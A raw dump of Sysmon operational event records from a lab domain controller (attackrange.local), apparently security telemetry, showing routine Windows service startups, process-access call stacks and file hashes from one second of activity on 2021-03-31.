|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.308{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.317{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.317{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.316{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.296{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.295{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.270{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.270{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.252{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.252{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.005{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=44CFD427E8845A455BDE9B7284CD042B,SHA256=EAD9E26AF8996DDC2723D3D393F31D16DBEBDF448702BBBC60BB19831970C7AA,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.237{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.221{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.234{266CAFBE-647D-6064-3700-00000000AE01}3324C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.158{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.158{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.143{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.143{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.143{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.127{266CAFBE-647D-6064-3600-00000000AE01}2704\netdfsC:\Windows\system32\dfssvc.exe 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.127{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 